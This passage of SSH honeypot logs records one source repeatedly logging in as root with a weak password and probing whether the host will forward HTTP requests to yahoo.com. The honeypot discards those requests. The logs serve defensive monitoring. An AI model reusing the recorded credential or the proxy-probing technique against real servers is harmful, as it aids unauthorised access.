sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:24.015080Z","src_ip":"213.209.150.239","session":"383f8c6c066b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:24.249630Z","src_ip":"213.209.150.239","session":"383f8c6c066b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":18716,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:18716","sensor":"my-vps","timestamp":"2025-08-26T01:05:24.297553Z","session":"383f8c6c066b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:24.344611Z","src_ip":"213.209.150.239","session":"383f8c6c066b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":9240,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:9240","sensor":"my-vps","timestamp":"2025-08-26T01:05:24.481417Z","session":"383f8c6c066b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:24.528520Z","src_ip":"213.209.150.239","session":"383f8c6c066b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:24.576312Z","src_ip":"213.209.150.239","session":"383f8c6c066b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":36222,"dst_ip":"1.2.3.4","dst_port":22,"session":"16066b403d88","protocol":"ssh","message":"New connection: 213.209.150.239:36222 (1.2.3.4:22) [session: 16066b403d88]","sensor":"my-vps","timestamp":"2025-08-26T01:05:24.622440Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:24.623287Z","src_ip":"213.209.150.239","session":"16066b403d88"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:24.670274Z","src_ip":"213.209.150.239","session":"16066b403d88"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:24.904615Z","src_ip":"213.209.150.239","session":"16066b403d88"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":22686,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:22686","sensor":"my-vps","timestamp":"2025-08-26T01:05:24.953033Z","session":"16066b403d88"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:25.000056Z","src_ip":"213.209.150.239","session":"16066b403d88"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":5309,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:5309","sensor":"my-vps","timestamp":"2025-08-26T01:05:25.137400Z","session":"16066b403d88"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:25.184592Z","src_ip":"213.209.150.239","session":"16066b403d88"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:25.232426Z","src_ip":"213.209.150.239","session":"16066b403d88"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":36278,"dst_ip":"1.2.3.4","dst_port":22,"session":"867d2df4d055","protocol":"ssh","message":"New connection: 213.209.150.239:36278 (1.2.3.4:22) [session: 867d2df4d055]","sensor":"my-vps","timestamp":"2025-08-26T01:05:25.288056Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:25.289061Z","src_ip":"213.209.150.239","session":"867d2df4d055"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:25.345892Z","src_ip":"213.209.150.239","session":"867d2df4d055"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:25.627906Z","src_ip":"213.209.150.239","session":"867d2df4d055"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":10558,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:10558","sensor":"my-vps","timestamp":"2025-08-26T01:05:25.685571Z","session":"867d2df4d055"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:25.742232Z","src_ip":"213.209.150.239","session":"867d2df4d055"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":20738,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:20738","sensor":"my-vps","timestamp":"2025-08-26T01:05:25.899005Z","session":"867d2df4d055"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:25.955524Z","src_ip":"213.209.150.239","session":"867d2df4d055"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:26.013167Z","src_ip":"213.209.150.239","session":"867d2df4d055"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":36372,"dst_ip":"1.2.3.4","dst_port":22,"session":"da8b52f2cc98","protocol":"ssh","message":"New connection: 213.209.150.239:36372 (1.2.3.4:22) [session: da8b52f2cc98]","sensor":"my-vps","timestamp":"2025-08-26T01:05:26.059298Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:26.060324Z","src_ip":"213.209.150.239","session":"da8b52f2cc98"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:26.107401Z","src_ip":"213.209.150.239","session":"da8b52f2cc98"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:26.342362Z","src_ip":"213.209.150.239","session":"da8b52f2cc98"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":16483,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:16483","sensor":"my-vps","timestamp":"2025-08-26T01:05:26.390650Z","session":"da8b52f2cc98"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:26.437804Z","src_ip":"213.209.150.239","session":"da8b52f2cc98"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":9375,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:9375","sensor":"my-vps","timestamp":"2025-08-26T01:05:26.573603Z","session":"da8b52f2cc98"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:26.621156Z","src_ip":"213.209.150.239","session":"da8b52f2cc98"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:26.670058Z","src_ip":"213.209.150.239","session":"da8b52f2cc98"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":36415,"dst_ip":"1.2.3.4","dst_port":22,"session":"058daf91da86","protocol":"ssh","message":"New connection: 213.209.150.239:36415 (1.2.3.4:22) [session: 058daf91da86]","sensor":"my-vps","timestamp":"2025-08-26T01:05:26.725767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:26.726537Z","src_ip":"213.209.150.239","session":"058daf91da86"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:26.783166Z","src_ip":"213.209.150.239","session":"058daf91da86"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:27.065905Z","src_ip":"213.209.150.239","session":"058daf91da86"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":15248,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:15248","sensor":"my-vps","timestamp":"2025-08-26T01:05:27.123744Z","session":"058daf91da86"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:27.180605Z","src_ip":"213.209.150.239","session":"058daf91da86"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":11846,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:11846","sensor":"my-vps","timestamp":"2025-08-26T01:05:27.335141Z","session":"058daf91da86"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:27.392252Z","src_ip":"213.209.150.239","session":"058daf91da86"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:27.449637Z","src_ip":"213.209.150.239","session":"058daf91da86"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":36510,"dst_ip":"1.2.3.4","dst_port":22,"session":"e41ad2fdc115","protocol":"ssh","message":"New connection: 213.209.150.239:36510 (1.2.3.4:22) [session: e41ad2fdc115]","sensor":"my-vps","timestamp":"2025-08-26T01:05:27.505375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:27.506329Z","src_ip":"213.209.150.239","session":"e41ad2fdc115"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:27.563057Z","src_ip":"213.209.150.239","session":"e41ad2fdc115"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:27.845491Z","src_ip":"213.209.150.239","session":"e41ad2fdc115"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":27958,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:27958","sensor":"my-vps","timestamp":"2025-08-26T01:05:27.903871Z","session":"e41ad2fdc115"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:27.960727Z","src_ip":"213.209.150.239","session":"e41ad2fdc115"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":797,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:797","sensor":"my-vps","timestamp":"2025-08-26T01:05:28.114982Z","session":"e41ad2fdc115"}
